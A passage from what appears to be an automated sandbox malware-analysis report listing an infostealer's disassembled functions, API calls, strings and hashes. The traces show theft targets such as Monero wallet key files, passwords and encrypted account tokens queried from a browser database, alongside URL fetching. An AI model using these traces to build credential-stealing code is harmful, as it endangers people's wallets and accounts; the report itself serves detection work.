                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: cc8d40b1d6d43edcddba5faaa64fe4510b8cb8d2ac8698409d49da40b86557e9
                        • Instruction ID: c95b310eb21225770dc142d33a183c3f86b0a2479d6bc71a88b8e2732d8b8a3c
                        • Opcode Fuzzy Hash: cc8d40b1d6d43edcddba5faaa64fe4510b8cb8d2ac8698409d49da40b86557e9
                        • Instruction Fuzzy Hash: DB613AB590426C9BDB24DB50ED45FDAB7B8BF44304F0091E9E689B6141DBB06BC9CFA0
                        Function 00E2BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        • lstrlen.KERNEL32(00000000), ref: 00E2BC9F
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E2BCCD
                        • lstrlen.KERNEL32(00000000), ref: 00E2BDA5
                        • lstrlen.KERNEL32(00000000), ref: 00E2BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 0ead5b5e3cad6147913034a2f70c15e5e6f27e0e2a83ae021f66354c9b4e3c86
                        • Instruction ID: 93cbea0ba7ab0bc6045233488a53c514f27eaf3dc737599f456a5f2f9c831026
                        • Opcode Fuzzy Hash: 0ead5b5e3cad6147913034a2f70c15e5e6f27e0e2a83ae021f66354c9b4e3c86
                        • Instruction Fuzzy Hash: BCB13572910108ABDF18FBA0DD5AEEE77B8AF54300F445168F546B3091EF346E89CB62
                        Function 00E36770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: b3637c3c3f8aac6c573ba226f03fb73d1d2324de4932ff40ed4f5c60b0111ca8
                        • Instruction ID: 57713901a65994fe8a648f7e7c0fa8cb294bec78f159bda68e42e95f0bb0ae7f
                        • Opcode Fuzzy Hash: b3637c3c3f8aac6c573ba226f03fb73d1d2324de4932ff40ed4f5c60b0111ca8
                        • Instruction Fuzzy Hash: 67F05E30A04209EFD354AFE0E90D72C7BB0FB04707F044199E64AA7294D67E4B41DB95
                        Function 00E24FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E24FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E24FD1
                        • InternetOpenA.WININET(00E40DDF,00000000,00000000,00000000,00000000), ref: 00E24FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E25011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E25041
                        • InternetCloseHandle.WININET(?), ref: 00E250B9
                        • InternetCloseHandle.WININET(?), ref: 00E250C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 8f54e1fcd4a6f20883f74456b82fabad61b6b57a4553e38ece80fb7d5ab60ccb
                        • Instruction ID: 6fdcf89ff015bc98db8d98a238a7d3d6e375905917bc93966f8fb593d63792e7
                        • Opcode Fuzzy Hash: 8f54e1fcd4a6f20883f74456b82fabad61b6b57a4553e38ece80fb7d5ab60ccb
                        • Instruction Fuzzy Hash: 1E3106B5A00218EBDB20DF54DD85BDCB7B4FB48704F1081D9EA0AB7281C7746AC58F98
                        Function 00E383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E38426
                        • wsprintfA.USER32 ref: 00E38459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E3847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E3848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E38499
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0196F6F0,00000000,000F003F,?,00000400), ref: 00E384EC
                        • lstrlen.KERNEL32(?), ref: 00E38501
                        • RegQueryValueExA.ADVAPI32(00000000,0196F738,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E40B34), ref: 00E38599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E38608
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E3861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 2fc94e1414952b7527a9be5169659b70e9cf53fb6953db9cbbad1f9b66422a0d
                        • Instruction ID: 50c03d7c344cb35a73dd37e0fd0c42e934350e696546d5239691e483e0e13875
                        • Opcode Fuzzy Hash: 2fc94e1414952b7527a9be5169659b70e9cf53fb6953db9cbbad1f9b66422a0d
                        • Instruction Fuzzy Hash: 5721F6B1A10218AFDB24DB54DC85FE9B7B8FB48704F0081D8E649A6140DF75AA85CFE4
                        Function 00E37690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E376A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E376AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0195BBE8,00000000,00020119,00000000), ref: 00E376DD
                        • RegQueryValueExA.ADVAPI32(00000000,0196F648,00000000,00000000,?,000000FF), ref: 00E376FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E37708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 801e7225e3d42c67d8057dfe26b548a92b04d07e11b56dada58f7fcf38a5cc1d
                        • Instruction ID: 331e7e9f0185e07cb57abd50bd3a9f63a05cf65a34117454784fe30975b7efa2
                        • Opcode Fuzzy Hash: 801e7225e3d42c67d8057dfe26b548a92b04d07e11b56dada58f7fcf38a5cc1d
                        • Instruction Fuzzy Hash: DD0144B5B04204FFD720EBE4DD4DF6A77B8EB44701F104055FA85B7295D6799900CB50
                        Function 00E37720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E3773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0195BBE8,00000000,00020119,00E376B9), ref: 00E3775B
                        • RegQueryValueExA.ADVAPI32(00E376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E3777A
                        • RegCloseKey.ADVAPI32(00E376B9), ref: 00E37784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: d24911f309100f7ab4173d26ac912b012044db2b8779c40ade73735cebe9f65e
                        • Instruction ID: 39dd78d718e661befc5b7c3127fc48f71489415c650a6d429bd53fa02fdf6485
                        • Opcode Fuzzy Hash: d24911f309100f7ab4173d26ac912b012044db2b8779c40ade73735cebe9f65e
                        • Instruction Fuzzy Hash: 3C0144B5A40308FFD710EBE0DC4AFAEB7B8EB44701F004155FA45B7285D6756600CB50
                        Function 00E392E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00E33AEE,?), ref: 00E392FC
                        • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00E39319
                        • CloseHandle.KERNEL32(000000FF), ref: 00E39327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :$:
                        • API String ID: 1378416451-4250114551
                        • Opcode ID: 691a735b3c74926b4e5717880bb2048011f2ef27aa0531dedb67c05eb5eccdf8
                        • Instruction ID: be59d5b22b108d74bdd17dea0e58b364d76f750d209061bc6570439761a6d92f
                        • Opcode Fuzzy Hash: 691a735b3c74926b4e5717880bb2048011f2ef27aa0531dedb67c05eb5eccdf8
                        • Instruction Fuzzy Hash: 40F01975F44208EBDB20EAA0DC49B9E7BB9AB48710F108254F651B72C4D7B99A018B40
                        Function 00E299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                        • LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 6fbb6535f627e07b6ceedd5e71bc496058d6eacbf3738278a1adebb3809a48da
                        • Instruction ID: 15c782a1a95cbb88528d086f61c75c6babc53d2bd85ba550f57c5bef0732d91e
                        • Opcode Fuzzy Hash: 6fbb6535f627e07b6ceedd5e71bc496058d6eacbf3738278a1adebb3809a48da
                        • Instruction Fuzzy Hash: EC3118B4A00209EFDB24DF94D885BAE77B5FF48304F109158E901B7290D779AA41CFA0
                        Function 00E34780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0196F1F8), ref: 00E347DB
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34801
                        • lstrcat.KERNEL32(?,?), ref: 00E34820
                        • lstrcat.KERNEL32(?,?), ref: 00E34834
                        • lstrcat.KERNEL32(?,0195A538), ref: 00E34847
                        • lstrcat.KERNEL32(?,?), ref: 00E3485B
                        • lstrcat.KERNEL32(?,0196E6D8), ref: 00E3486F
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E38D90: GetFileAttributesA.KERNEL32(00000000,?,00E21B54,?,?,00E4564C,?,?,00E40E1F), ref: 00E38D9F
                          • Part of subcall function 00E34570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E34580
                          • Part of subcall function 00E34570: RtlAllocateHeap.NTDLL(00000000), ref: 00E34587
                          • Part of subcall function 00E34570: wsprintfA.USER32 ref: 00E345A6
                          • Part of subcall function 00E34570: FindFirstFileA.KERNEL32(?,?), ref: 00E345BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 43e635ab95de405bd902407199aca4b63f877cac0242d0f3d822655ac0b545ab
                        • Instruction ID: b095e17423b18fbe662a6c5861adf4e1215d2d32b1fd9b49dfa6f1225efb4d3c
                        • Opcode Fuzzy Hash: 43e635ab95de405bd902407199aca4b63f877cac0242d0f3d822655ac0b545ab
                        • Instruction Fuzzy Hash: D03165B2900318ABCB24F760DC89EED77BCAB58700F405599B359B6081DE75D789CB91
                        Function 00E32C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
